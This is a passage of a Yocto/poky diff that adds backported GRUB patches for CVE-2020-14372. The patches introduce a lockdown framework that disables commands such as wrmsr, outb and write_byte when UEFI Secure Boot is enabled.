$(top_srcdir)/include/grub/verify.h + KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/mm_private.h + KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/net.h + KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/memory.h +diff --git a/grub-core/Makefile.core.def b/grub-core/Makefile.core.def +index 474a63e..cff02f2 100644 +--- a/grub-core/Makefile.core.def ++++ b/grub-core/Makefile.core.def +@@ -140,6 +140,7 @@ kernel = { + common = kern/rescue_parser.c; + common = kern/rescue_reader.c; + common = kern/term.c; ++ common = kern/verifiers.c; + + noemu = kern/compiler-rt.c; + noemu = kern/mm.c; +@@ -942,11 +943,6 @@ module = { + cppflags = '-I$(srcdir)/lib/posix_wrap'; + }; + +-module = { +- name = verifiers; +- common = commands/verifiers.c; +-}; +- + module = { + name = shim_lock; + common = commands/efi/shim_lock.c; +diff --git a/grub-core/kern/main.c b/grub-core/kern/main.c +index 9cad0c4..73967e2 100644 +--- a/grub-core/kern/main.c ++++ b/grub-core/kern/main.c +@@ -29,6 +29,7 @@ + #include <grub/command.h> + #include <grub/reader.h> + #include <grub/parser.h> ++#include <grub/verify.h> + + #ifdef GRUB_MACHINE_PCBIOS + #include <grub/machine/memory.h> +@@ -274,6 +275,9 @@ grub_main (void) + grub_printf ("Welcome to GRUB!\n\n"); + grub_setcolorstate (GRUB_TERM_COLOR_STANDARD); + ++ /* Init verifiers API. */ ++ grub_verifiers_init (); ++ + grub_load_config (); + + grub_boot_time ("Before loading embedded modules."); +diff --git a/grub-core/commands/verifiers.c b/grub-core/kern/verifiers.c +similarity index 97% +rename from grub-core/commands/verifiers.c +rename to grub-core/kern/verifiers.c +index 0dde481..aa3dc7c 100644 +--- a/grub-core/commands/verifiers.c ++++ b/grub-core/kern/verifiers.c +@@ -217,12 +217,8 @@ grub_verify_string (char *str, enum grub_verify_string_type type) + return GRUB_ERR_NONE; + } + +-GRUB_MOD_INIT(verifiers) ++void ++grub_verifiers_init (void) + { + grub_file_filter_register (GRUB_FILE_FILTER_VERIFY, grub_verifiers_open); + } +- +-GRUB_MOD_FINI(verifiers) +-{ +- grub_file_filter_unregister (GRUB_FILE_FILTER_VERIFY); +-} +diff --git a/include/grub/verify.h b/include/grub/verify.h +index ea04914..cd129c3 100644 +--- a/include/grub/verify.h ++++ b/include/grub/verify.h +@@ -64,7 +64,10 @@ struct grub_file_verifier + grub_err_t (*verify_string) (char *str, enum grub_verify_string_type type); + }; + +-extern struct grub_file_verifier *grub_file_verifiers; ++extern struct grub_file_verifier *EXPORT_VAR (grub_file_verifiers); ++ ++extern void ++grub_verifiers_init (void); + + static inline void + grub_verifier_register (struct grub_file_verifier *ver) +@@ -78,7 +81,7 @@ grub_verifier_unregister (struct grub_file_verifier *ver) + grub_list_remove (GRUB_AS_LIST (ver)); + } + +-grub_err_t +-grub_verify_string (char *str, enum grub_verify_string_type type); ++extern grub_err_t ++EXPORT_FUNC (grub_verify_string) (char *str, enum grub_verify_string_type type); + + #endif /* ! GRUB_VERIFY_HEADER */ diff --git a/poky/meta/recipes-bsp/grub/files/CVE-2020-14372_2.patch b/poky/meta/recipes-bsp/grub/files/CVE-2020-14372_2.patch new file mode 100644 index 0000000000..a98b5d0455 --- /dev/null +++ b/poky/meta/recipes-bsp/grub/files/CVE-2020-14372_2.patch @@ -0,0 +1,431 @@ +From d8aac4517fef0f0188a60a2a8ff9cafdd9c7ca42 Mon Sep 17 00:00:00 2001 +From: Javier Martinez Canillas <javierm@redhat.com> +Date: Mon, 28 Sep 2020 20:08:02 +0200 +Subject: [PATCH] kern: Add lockdown support + +When the GRUB starts on a secure boot platform, some commands can be +used to subvert the protections provided by the verification mechanism and +could lead to booting untrusted system. + +To prevent that situation, allow GRUB to be locked down. That way the code +may check if GRUB has been locked down and further restrict the commands +that are registered or what subset of their functionality could be used. + +The lockdown support adds the following components: + +* The grub_lockdown() function which can be used to lockdown GRUB if, + e.g., UEFI Secure Boot is enabled. + +* The grub_is_lockdown() function which can be used to check if the GRUB + was locked down. + +* A verifier that flags OS kernels, the GRUB modules, Device Trees and ACPI + tables as GRUB_VERIFY_FLAGS_DEFER_AUTH to defer verification to other + verifiers. These files are only successfully verified if another registered + verifier returns success. Otherwise, the whole verification process fails. + + For example, PE/COFF binaries verification can be done by the shim_lock + verifier which validates the signatures using the shim_lock protocol. + However, the verification is not deferred directly to the shim_lock verifier. + The shim_lock verifier is hooked into the verification process instead. + +* A set of grub_{command,extcmd}_lockdown functions that can be used by + code registering command handlers, to only register unsafe commands if + the GRUB has not been locked down. + +Signed-off-by: Javier Martinez Canillas <javierm@redhat.com> +Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com> + +Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=578c95298bcc46e0296f4c786db64c2ff26ce2cc] +CVE: CVE-2020-14372 +Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com> +--- + conf/Makefile.common | 2 + + docs/grub-dev.texi | 27 +++++++++++++ + docs/grub.texi | 8 ++++ + grub-core/Makefile.am | 5 ++- + grub-core/Makefile.core.def | 1 + + grub-core/commands/extcmd.c | 23 +++++++++++ + grub-core/kern/command.c | 24 +++++++++++ + grub-core/kern/lockdown.c | 80 +++++++++++++++++++++++++++++++++++++ + include/grub/command.h | 5 +++ + include/grub/extcmd.h | 7 ++++ + include/grub/lockdown.h | 44 ++++++++++++++++++++ + 11 files changed, 225 insertions(+), 1 deletion(-) + create mode 100644 grub-core/kern/lockdown.c + create mode 100644 include/grub/lockdown.h + +diff --git a/conf/Makefile.common b/conf/Makefile.common +index 6cd71cb..2a1a886 100644 +--- a/conf/Makefile.common ++++ b/conf/Makefile.common +@@ -84,7 +84,9 @@ CPPFLAGS_PARTTOOL_LIST = -Dgrub_parttool_register=PARTTOOL_LIST_MARKER + CPPFLAGS_TERMINAL_LIST = '-Dgrub_term_register_input(...)=INPUT_TERMINAL_LIST_MARKER(__VA_ARGS__)' + CPPFLAGS_TERMINAL_LIST += '-Dgrub_term_register_output(...)=OUTPUT_TERMINAL_LIST_MARKER(__VA_ARGS__)' + CPPFLAGS_COMMAND_LIST = '-Dgrub_register_command(...)=COMMAND_LIST_MARKER(__VA_ARGS__)' ++CPPFLAGS_COMMAND_LIST += '-Dgrub_register_command_lockdown(...)=COMMAND_LOCKDOWN_LIST_MARKER(__VA_ARGS__)' + CPPFLAGS_COMMAND_LIST += '-Dgrub_register_extcmd(...)=EXTCOMMAND_LIST_MARKER(__VA_ARGS__)' ++CPPFLAGS_COMMAND_LIST += '-Dgrub_register_extcmd_lockdown(...)=EXTCOMMAND_LOCKDOWN_LIST_MARKER(__VA_ARGS__)' + CPPFLAGS_COMMAND_LIST += '-Dgrub_register_command_p1(...)=P1COMMAND_LIST_MARKER(__VA_ARGS__)' + CPPFLAGS_FDT_LIST := '-Dgrub_fdtbus_register(...)=FDT_DRIVER_LIST_MARKER(__VA_ARGS__)' + CPPFLAGS_MARKER = $(CPPFLAGS_FS_LIST) $(CPPFLAGS_VIDEO_LIST) \ +diff --git a/docs/grub-dev.texi b/docs/grub-dev.texi +index ee389fd..635ec72 100644 +--- a/docs/grub-dev.texi ++++ b/docs/grub-dev.texi +@@ -86,6 +86,7 @@ This edition documents version @value{VERSION}. + * PFF2 Font File Format:: + * Graphical Menu Software Design:: + * Verifiers framework:: ++* Lockdown framework:: + * Copying This Manual:: Copying This Manual + * Index:: + @end menu +@@ -2086,6 +2087,32 @@ Optionally at the end of the file @samp{fini}, if it exists, is called with just + the context. If you return no error during any of @samp{init}, @samp{write} and + @samp{fini} then the file is considered as having succeded verification. + ++@node Lockdown framework ++@chapter Lockdown framework ++ ++The GRUB can be locked down, which is a restricted mode where some operations ++are not allowed. For instance, some commands cannot be used when the GRUB is ++locked down. ++ ++The function ++@code{grub_lockdown()} is used to lockdown GRUB and the function ++@code{grub_is_lockdown()} function can be used to check whether lockdown is ++enabled or not. When enabled, the function returns @samp{GRUB_LOCKDOWN_ENABLED} ++and @samp{GRUB_LOCKDOWN_DISABLED} when is not enabled. ++ ++The following functions can be used to register the commands that can only be ++used when lockdown is disabled: ++ ++@itemize ++ ++@item @code{grub_cmd_lockdown()} registers command which should not run when the ++GRUB is in lockdown mode. ++ ++@item @code{grub_cmd_lockdown()} registers extended command which should not run ++when the GRUB is in lockdown mode. ++ ++@end itemize ++ + @node Copying This Manual + @appendix Copying This Manual + +diff --git a/docs/grub.texi b/docs/grub.texi +index 8779507..d778bfb 100644 +--- a/docs/grub.texi ++++ b/docs/grub.texi +@@ -5581,6 +5581,7 @@ environment variables and commands are listed in the same order. + * Using digital signatures:: Booting digitally signed code + * UEFI secure boot and shim:: Booting digitally signed PE files + * Measured Boot:: Measuring boot components ++* Lockdown:: Lockdown when booting on a secure setup + @end menu + + @node Authentication and authorisation +@@ -5794,6 +5795,13 @@ into @file{core.img} in order to avoid a potential gap in measurement between + + Measured boot is currently only supported on EFI platforms. + ++@node Lockdown ++@section Lockdown when booting on a secure setup ++ ++The GRUB can be locked down when booted on a secure boot environment, for example ++if the UEFI secure boot is enabled. On a locked down configuration, the GRUB will ++be restricted and some operations/commands cannot be executed. ++ + @node Platform limitations + @chapter Platform limitations + +diff --git a/grub-core/Makefile.am b/grub-core/Makefile.am +index 375c30d..3096241 100644 +--- a/grub-core/Makefile.am ++++ b/grub-core/Makefile.am +@@ -79,6 +79,7 @@ KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/fs.h + KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/i18n.h + KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/kernel.h + KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/list.h ++KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/lockdown.h + KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/misc.h + if COND_emu + KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/compiler-rt-emu.h +@@ -376,8 +377,10 @@ command.lst: $(MARKER_FILES) + b=`basename $$pp .marker`; \ + sed -n \ + -e "/EXTCOMMAND_LIST_MARKER *( *\"/{s/.*( *\"\([^\"]*\)\".*/*\1: $$b/;p;}" \ ++ -e "/EXTCOMMAND_LOCKDOWN_LIST_MARKER *( *\"/{s/.*( *\"\([^\"]*\)\".*/*\1: $$b/;p;}" \ + -e "/P1COMMAND_LIST_MARKER *( *\"/{s/.*( *\"\([^\"]*\)\".*/*\1: $$b/;p;}" \ +- -e "/COMMAND_LIST_MARKER *( *\"/{s/.*( *\"\([^\"]*\)\".*/\1: $$b/;p;}" $$pp; \ ++ -e "/COMMAND_LIST_MARKER *( *\"/{s/.*( *\"\([^\"]*\)\".*/\1: $$b/;p;}" \ ++ -e "/COMMAND_LOCKDOWN_LIST_MARKER *( *\"/{s/.*( *\"\([^\"]*\)\".*/\1: $$b/;p;}" $$pp; \ + done) | sort -u > $@ + platform_DATA += command.lst + CLEANFILES += command.lst +diff --git a/grub-core/Makefile.core.def b/grub-core/Makefile.core.def +index cff02f2..651ea2a 100644 +--- a/grub-core/Makefile.core.def ++++ b/grub-core/Makefile.core.def +@@ -204,6 +204,7 @@ kernel = { + efi = term/efi/console.c; + efi = kern/acpi.c; + efi = kern/efi/acpi.c; ++ efi = kern/lockdown.c; + i386_coreboot = kern/i386/pc/acpi.c; + i386_multiboot = kern/i386/pc/acpi.c; + i386_coreboot = kern/acpi.c; +diff --git a/grub-core/commands/extcmd.c b/grub-core/commands/extcmd.c +index 69574e2..90a5ca2 100644 +--- a/grub-core/commands/extcmd.c ++++ b/grub-core/commands/extcmd.c +@@ -19,6 +19,7 @@ + + #include <grub/mm.h> + #include <grub/list.h> ++#include <grub/lockdown.h> + #include <grub/misc.h> + #include <grub/extcmd.h> + #include <grub/script_sh.h> +@@ -110,6 +111,28 @@ grub_register_extcmd (const char *name, grub_extcmd_func_t func, + summary, description, parser, 1); + } + ++static grub_err_t ++grub_extcmd_lockdown (grub_extcmd_context_t ctxt __attribute__ ((unused)), ++ int argc __attribute__ ((unused)), ++ char **argv __attribute__ ((unused))) ++{ ++ return grub_error (GRUB_ERR_ACCESS_DENIED, ++ N_("%s: the command is not allowed when lockdown is enforced"), ++ ctxt->extcmd->cmd->name); ++} ++ ++grub_extcmd_t ++grub_register_extcmd_lockdown (const char *name, grub_extcmd_func_t func, ++ grub_command_flags_t flags, const char *summary, ++ const char *description, ++ const struct grub_arg_option *parser) ++{ ++ if (grub_is_lockdown () == GRUB_LOCKDOWN_ENABLED) ++ func = grub_extcmd_lockdown; ++ ++ return grub_register_extcmd (name, func, flags, summary, description, parser); ++} ++ + void + grub_unregister_extcmd (grub_extcmd_t ext) + { +diff --git a/grub-core/kern/command.c b/grub-core/kern/command.c +index acd7218..4aabcd4 100644 +--- a/grub-core/kern/command.c ++++ b/grub-core/kern/command.c +@@ -17,6 +17,7 @@ + * along with GRUB. If not, see <http://www.gnu.org/licenses/>. + */ + ++#include <grub/lockdown.h> + #include <grub/mm.h> + #include <grub/command.h> + +@@ -77,6 +78,29 @@ grub_register_command_prio (const char *name, + return cmd; + } + ++static grub_err_t ++grub_cmd_lockdown (grub_command_t cmd __attribute__ ((unused)), ++ int argc __attribute__ ((unused)), ++ char **argv __attribute__ ((unused))) ++ ++{ ++ return grub_error (GRUB_ERR_ACCESS_DENIED, ++ N_("%s: the command is not allowed when lockdown is enforced"), ++ cmd->name); ++} ++ ++grub_command_t ++grub_register_command_lockdown (const char *name, ++ grub_command_func_t func, ++ const char *summary, ++ const char *description) ++{ ++ if (grub_is_lockdown () == GRUB_LOCKDOWN_ENABLED) ++ func = grub_cmd_lockdown; ++ ++ return grub_register_command_prio (name, func, summary, description, 0); ++} ++ + void + grub_unregister_command (grub_command_t cmd) + { +diff --git a/grub-core/kern/lockdown.c b/grub-core/kern/lockdown.c +new file mode 100644 +index 0000000..1e56c0b +--- /dev/null ++++ b/grub-core/kern/lockdown.c +@@ -0,0 +1,80 @@ ++/* ++ * GRUB -- GRand Unified Bootloader ++ * Copyright (C) 2020 Free Software Foundation, Inc. ++ * ++ * GRUB is free software: you can redistribute it and/or modify ++ * it under the terms of the GNU General Public License as published by ++ * the Free Software Foundation, either version 3 of the License, or ++ * (at your option) any later version. ++ * ++ * GRUB is distributed in the hope that it will be useful, ++ * but WITHOUT ANY WARRANTY; without even the implied warranty of ++ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the ++ * GNU General Public License for more details. ++ * ++ * You should have received a copy of the GNU General Public License ++ * along with GRUB. If not, see <http://www.gnu.org/licenses/>. ++ * ++ */ ++ ++#include <grub/dl.h> ++#include <grub/file.h> ++#include <grub/lockdown.h> ++#include <grub/verify.h> ++ ++static int lockdown = GRUB_LOCKDOWN_DISABLED; ++ ++static grub_err_t ++lockdown_verifier_init (grub_file_t io __attribute__ ((unused)), ++ enum grub_file_type type, ++ void **context __attribute__ ((unused)), ++ enum grub_verify_flags *flags) ++{ ++ *flags = GRUB_VERIFY_FLAGS_SKIP_VERIFICATION; ++ ++ switch (type & GRUB_FILE_TYPE_MASK) ++ { ++ case GRUB_FILE_TYPE_GRUB_MODULE: ++ case GRUB_FILE_TYPE_LINUX_KERNEL: ++ case GRUB_FILE_TYPE_MULTIBOOT_KERNEL: ++ case GRUB_FILE_TYPE_XEN_HYPERVISOR: ++ case GRUB_FILE_TYPE_BSD_KERNEL: ++ case GRUB_FILE_TYPE_XNU_KERNEL: ++ case GRUB_FILE_TYPE_PLAN9_KERNEL: ++ case GRUB_FILE_TYPE_NTLDR: ++ case GRUB_FILE_TYPE_TRUECRYPT: ++ case GRUB_FILE_TYPE_FREEDOS: ++ case GRUB_FILE_TYPE_PXECHAINLOADER: ++ case GRUB_FILE_TYPE_PCCHAINLOADER: ++ case GRUB_FILE_TYPE_COREBOOT_CHAINLOADER: ++ case GRUB_FILE_TYPE_EFI_CHAINLOADED_IMAGE: ++ case GRUB_FILE_TYPE_ACPI_TABLE: ++ case GRUB_FILE_TYPE_DEVICE_TREE_IMAGE: ++ *flags = GRUB_VERIFY_FLAGS_DEFER_AUTH; ++ ++ /* Fall through. */ ++ ++ default: ++ return GRUB_ERR_NONE; ++ } ++} ++ ++struct grub_file_verifier lockdown_verifier = ++ { ++ .name = "lockdown_verifier", ++ .init = lockdown_verifier_init, ++ }; ++ ++void ++grub_lockdown (void) ++{ ++ lockdown = GRUB_LOCKDOWN_ENABLED; ++ ++ grub_verifier_register (&lockdown_verifier); ++} ++ ++int ++grub_is_lockdown (void) ++{ ++ return lockdown; ++} +diff --git a/include/grub/command.h b/include/grub/command.h +index eee4e84..2a6f7f8 100644 +--- a/include/grub/command.h ++++ b/include/grub/command.h +@@ -86,6 +86,11 @@ EXPORT_FUNC(grub_register_command_prio) (const char *name, + const char *summary, + const char *description, + int prio); ++grub_command_t ++EXPORT_FUNC(grub_register_command_lockdown) (const char *name, ++ grub_command_func_t func, ++ const char *summary, ++ const char *description); + void EXPORT_FUNC(grub_unregister_command) (grub_command_t cmd); + + static inline grub_command_t +diff --git a/include/grub/extcmd.h b/include/grub/extcmd.h +index 19fe592..fe9248b 100644 +--- a/include/grub/extcmd.h ++++ b/include/grub/extcmd.h +@@ -62,6 +62,13 @@ grub_extcmd_t EXPORT_FUNC(grub_register_extcmd) (const char *name, + const char *description, + const struct grub_arg_option *parser); + ++grub_extcmd_t EXPORT_FUNC(grub_register_extcmd_lockdown) (const char *name, ++ grub_extcmd_func_t func, ++ grub_command_flags_t flags, ++ const char *summary, ++ const char *description, ++ const struct grub_arg_option *parser); ++ + grub_extcmd_t EXPORT_FUNC(grub_register_extcmd_prio) (const char *name, + grub_extcmd_func_t func, + grub_command_flags_t flags, +diff --git a/include/grub/lockdown.h b/include/grub/lockdown.h +new file mode 100644 +index 0000000..40531fa +--- /dev/null ++++ b/include/grub/lockdown.h +@@ -0,0 +1,44 @@ ++/* ++ * GRUB -- GRand Unified Bootloader ++ * Copyright (C) 2020 Free Software Foundation, Inc. ++ * ++ * GRUB is free software: you can redistribute it and/or modify ++ * it under the terms of the GNU General Public License as published by ++ * the Free Software Foundation, either version 3 of the License, or ++ * (at your option) any later version. ++ * ++ * GRUB is distributed in the hope that it will be useful, ++ * but WITHOUT ANY WARRANTY; without even the implied warranty of ++ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the ++ * GNU General Public License for more details. ++ * ++ * You should have received a copy of the GNU General Public License ++ * along with GRUB. If not, see <http://www.gnu.org/licenses/>. ++ */ ++ ++#ifndef GRUB_LOCKDOWN_H ++#define GRUB_LOCKDOWN_H 1 ++ ++#include <grub/symbol.h> ++ ++#define GRUB_LOCKDOWN_DISABLED 0 ++#define GRUB_LOCKDOWN_ENABLED 1 ++ ++#ifdef GRUB_MACHINE_EFI ++extern void ++EXPORT_FUNC (grub_lockdown) (void); ++extern int ++EXPORT_FUNC (grub_is_lockdown) (void); ++#else ++static inline void ++grub_lockdown (void) ++{ ++} ++ ++static inline int ++grub_is_lockdown (void) ++{ ++ return GRUB_LOCKDOWN_DISABLED; ++} ++#endif ++#endif /* ! GRUB_LOCKDOWN_H */ diff --git a/poky/meta/recipes-bsp/grub/files/CVE-2020-14372_3.patch b/poky/meta/recipes-bsp/grub/files/CVE-2020-14372_3.patch new file mode 100644 index 0000000000..93fdd2cb1a --- /dev/null +++ b/poky/meta/recipes-bsp/grub/files/CVE-2020-14372_3.patch @@ -0,0 +1,57 @@ +From bfb9c44298aa202c176fef8dc5ea48f9b0e76e5e Mon Sep 17 00:00:00 2001 +From: Javier Martinez Canillas <javierm@redhat.com> +Date: Tue, 2 Feb 2021 19:59:48 +0100 +Subject: [PATCH] kern/lockdown: Set a variable if the GRUB is locked down + +It may be useful for scripts to determine whether the GRUB is locked +down or not. Add the lockdown variable which is set to "y" when the GRUB +is locked down. + +Suggested-by: Dimitri John Ledkov <xnox@ubuntu.com> +Signed-off-by: Javier Martinez Canillas <javierm@redhat.com> +Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com> + +Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=d90367471779c240e002e62edfb6b31fc85b4908] +CVE: CVE-2020-14372 +Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com> +--- + docs/grub.texi | 3 +++ + grub-core/kern/lockdown.c | 4 ++++ + 2 files changed, 7 insertions(+) + +diff --git a/docs/grub.texi b/docs/grub.texi +index d778bfb..5e6cace 100644 +--- a/docs/grub.texi ++++ b/docs/grub.texi +@@ -5802,6 +5802,9 @@ The GRUB can be locked down when booted on a secure boot environment, for exampl + if the UEFI secure boot is enabled. On a locked down configuration, the GRUB will + be restricted and some operations/commands cannot be executed. + ++The @samp{lockdown} variable is set to @samp{y} when the GRUB is locked down. ++Otherwise it does not exit. ++ + @node Platform limitations + @chapter Platform limitations + +diff --git a/grub-core/kern/lockdown.c b/grub-core/kern/lockdown.c +index 1e56c0b..0bc70fd 100644 +--- a/grub-core/kern/lockdown.c ++++ b/grub-core/kern/lockdown.c +@@ -18,6 +18,7 @@ + */ + + #include <grub/dl.h> ++#include <grub/env.h> + #include <grub/file.h> + #include <grub/lockdown.h> + #include <grub/verify.h> +@@ -71,6 +72,9 @@ grub_lockdown (void) + lockdown = GRUB_LOCKDOWN_ENABLED; + + grub_verifier_register (&lockdown_verifier); ++ ++ grub_env_set ("lockdown", "y"); ++ grub_env_export ("lockdown"); + } + + int diff --git a/poky/meta/recipes-bsp/grub/files/CVE-2020-14372_4.patch b/poky/meta/recipes-bsp/grub/files/CVE-2020-14372_4.patch new file mode 100644 index 0000000000..ac509b63c7 --- /dev/null +++ b/poky/meta/recipes-bsp/grub/files/CVE-2020-14372_4.patch @@ -0,0 +1,52 @@ +From 0d809c0979ced9db4d0e500b3e812bba95e52972 Mon Sep 17 00:00:00 2001 +From: Javier Martinez Canillas <javierm@redhat.com> +Date: Mon, 28 Sep 2020 20:08:29 +0200 +Subject: [PATCH] efi: Lockdown the GRUB when the UEFI Secure Boot is enabled + +If the UEFI Secure Boot is enabled then the GRUB must be locked down +to prevent executing code that can potentially be used to subvert its +verification mechanisms. + +Signed-off-by: Javier Martinez Canillas <javierm@redhat.com> +Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com> + +Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=98b00a403cbf2ba6833d1ac0499871b27a08eb77] +CVE: CVE-2020-14372 +Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com> +--- + grub-core/kern/efi/init.c | 15 +++++++++++++++ + 1 file changed, 15 insertions(+) + +diff --git a/grub-core/kern/efi/init.c b/grub-core/kern/efi/init.c +index 3dfdf2d..db84d82 100644 +--- a/grub-core/kern/efi/init.c ++++ b/grub-core/kern/efi/init.c +@@ -20,6 +20,7 @@ + #include <grub/efi/efi.h> + #include <grub/efi/console.h> + #include <grub/efi/disk.h> ++#include <grub/lockdown.h> + #include <grub/term.h> + #include <grub/misc.h> + #include <grub/env.h> +@@ -39,6 +40,20 @@ grub_efi_init (void) + /* Initialize the memory management system. */ + grub_efi_mm_init (); + ++ /* ++ * Lockdown the GRUB and register the shim_lock verifier ++ * if the UEFI Secure Boot is enabled. ++ */ ++ if (grub_efi_secure_boot ()) ++ { ++ grub_lockdown (); ++ /* NOTE: Our version does not have the shim_lock_verifier, ++ * need to update below if added */ ++#if 0 ++ grub_shim_lock_verifier_setup (); ++#endif ++ } ++ + efi_call_4 (grub_efi_system_table->boot_services->set_watchdog_timer, + 0, 0, 0, NULL); + diff --git a/poky/meta/recipes-bsp/grub/files/CVE-2020-14372_5.patch b/poky/meta/recipes-bsp/grub/files/CVE-2020-14372_5.patch new file mode 100644 index 0000000000..12ec4e1c17 --- /dev/null +++ b/poky/meta/recipes-bsp/grub/files/CVE-2020-14372_5.patch @@ -0,0 +1,158 @@ +From 1ad728b08ba2a21573e5f81a565114f74ca33988 Mon Sep 17 00:00:00 2001 +From: Javier Martinez Canillas <javierm@redhat.com> +Date: Mon, 28 Sep 2020 20:08:33 +0200 +Subject: [PATCH] efi: Use grub_is_lockdown() instead of hardcoding a disabled + modules list + +Now the GRUB can check if it has been locked down and this can be used to +prevent executing commands that can be utilized to circumvent the UEFI +Secure Boot mechanisms. So, instead of hardcoding a list of modules that +have to be disabled, prevent the usage of commands that can be dangerous. + +This not only allows the commands to be disabled on other platforms, but +also properly separate the concerns. Since the shim_lock verifier logic +should be only about preventing to run untrusted binaries and not about +defining these kind of policies. + +Signed-off-by: Javier Martinez Canillas <javierm@redhat.com> +Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com> + +Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=8f73052885892bc0dbc01e297f79d7cf4925e491] +CVE: CVE-2020-14372 +Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com> +--- + docs/grub.texi | 10 ++++++++++ + grub-core/commands/i386/wrmsr.c | 5 +++-- + grub-core/commands/iorw.c | 19 ++++++++++--------- + grub-core/commands/memrw.c | 19 ++++++++++--------- + 4 files changed, 33 insertions(+), 20 deletions(-) + +diff --git a/docs/grub.texi b/docs/grub.texi +index 5e6cace..0786427 100644 +--- a/docs/grub.texi ++++ b/docs/grub.texi +@@ -5256,6 +5256,9 @@ only applies to the particular cpu/core/thread that runs the command. + Also, if you specify a reserved or unimplemented MSR address, it will + cause a general protection exception (which is not currently being handled) + and the system will reboot. ++ ++Note: The command is not allowed when lockdown is enforced (@pxref{Lockdown}). ++ This is done to prevent subverting various security mechanisms. + @end deffn + + @node xen_hypervisor +@@ -5758,6 +5761,13 @@ security reasons. All above mentioned requirements are enforced by the + shim_lock module. And itself it is a persistent module which means that + it cannot be unloaded if it was loaded into the memory. + ++All GRUB modules not stored in the @file{core.img}, OS kernels, ACPI tables, ++Device Trees, etc. have to be signed, e.g, using PGP. Additionally, the commands ++that can be used to subvert the UEFI secure boot mechanism, such as @command{iorw} ++and @command{memrw} will not be available when the UEFI secure boot is enabled. ++This is done for security reasons and are enforced by the GRUB Lockdown mechanism ++(@pxref{Lockdown}). ++ + @node Measured Boot + @section Measuring boot components + +diff --git a/grub-core/commands/i386/wrmsr.c b/grub-core/commands/i386/wrmsr.c +index 9c5e510..56a29c2 100644 +--- a/grub-core/commands/i386/wrmsr.c ++++ b/grub-core/commands/i386/wrmsr.c +@@ -24,6 +24,7 @@ + #include <grub/env.h> + #include <grub/command.h> + #include <grub/extcmd.h> ++#include <grub/lockdown.h> + #include <grub/i18n.h> + #include <grub/i386/cpuid.h> + #include <grub/i386/wrmsr.h> +@@ -83,8 +84,8 @@ grub_cmd_msr_write (grub_command_t cmd __attribute__ ((unused)), int argc, char + + GRUB_MOD_INIT(wrmsr) + { +- cmd_write = grub_register_command ("wrmsr", grub_cmd_msr_write, N_("ADDR VALUE"), +- N_("Write a value to a CPU model specific register.")); ++ cmd_write = grub_register_command_lockdown ("wrmsr", grub_cmd_msr_write, N_("ADDR VALUE"), ++ N_("Write a value to a CPU model specific register.")); + } + + GRUB_MOD_FINI(wrmsr) +diff --git a/grub-core/commands/iorw.c b/grub-core/commands/iorw.c +index a0c164e..584baec 100644 +--- a/grub-core/commands/iorw.c ++++ b/grub-core/commands/iorw.c +@@ -23,6 +23,7 @@ + #include <grub/env.h> + #include <grub/cpu/io.h> + #include <grub/i18n.h> ++#include <grub/lockdown.h> + + GRUB_MOD_LICENSE ("GPLv3+"); + +@@ -131,17 +132,17 @@ GRUB_MOD_INIT(memrw) + N_("PORT"), N_("Read 32-bit value from PORT."), + options); + cmd_write_byte = +- grub_register_command ("outb", grub_cmd_write, +- N_("PORT VALUE [MASK]"), +- N_("Write 8-bit VALUE to PORT.")); ++ grub_register_command_lockdown ("outb", grub_cmd_write, ++ N_("PORT VALUE [MASK]"), ++ N_("Write 8-bit VALUE to PORT.")); + cmd_write_word = +- grub_register_command ("outw", grub_cmd_write, +- N_("PORT VALUE [MASK]"), +- N_("Write 16-bit VALUE to PORT.")); ++ grub_register_command_lockdown ("outw", grub_cmd_write, ++ N_("PORT VALUE [MASK]"), ++ N_("Write 16-bit VALUE to PORT.")); + cmd_write_dword = +- grub_register_command ("outl", grub_cmd_write, +- N_("ADDR VALUE [MASK]"), +- N_("Write 32-bit VALUE to PORT.")); ++ grub_register_command_lockdown ("outl", grub_cmd_write, ++ N_("ADDR VALUE [MASK]"), ++ N_("Write 32-bit VALUE to PORT.")); + } + + GRUB_MOD_FINI(memrw) +diff --git a/grub-core/commands/memrw.c b/grub-core/commands/memrw.c +index 98769ea..d401a6d 100644 +--- a/grub-core/commands/memrw.c ++++ b/grub-core/commands/memrw.c +@@ -22,6 +22,7 @@ + #include <grub/extcmd.h> + #include <grub/env.h> + #include <grub/i18n.h> ++#include <grub/lockdown.h> + + GRUB_MOD_LICENSE ("GPLv3+"); + +@@ -133,17 +134,17 @@ GRUB_MOD_INIT(memrw) + N_("ADDR"), N_("Read 32-bit value from ADDR."), + options); + cmd_write_byte = +- grub_register_command ("write_byte", grub_cmd_write, +- N_("ADDR VALUE [MASK]"), +- N_("Write 8-bit VALUE to ADDR.")); ++ grub_register_command_lockdown ("write_byte", grub_cmd_write, ++ N_("ADDR VALUE [MASK]"), ++ N_("Write 8-bit VALUE to ADDR.")); + cmd_write_word = +- grub_register_command ("write_word", grub_cmd_write, +- N_("ADDR VALUE [MASK]"), +- N_("Write 16-bit VALUE to ADDR.")); ++ grub_register_command_lockdown ("write_word", grub_cmd_write, ++ N_("ADDR VALUE [MASK]"), ++ N_("Write 16-bit VALUE to ADDR.")); + cmd_write_dword = +- grub_register_command ("write_dword", grub_cmd_write, +- N_("ADDR VALUE [MASK]"), +- N_("Write 32-bit VALUE to 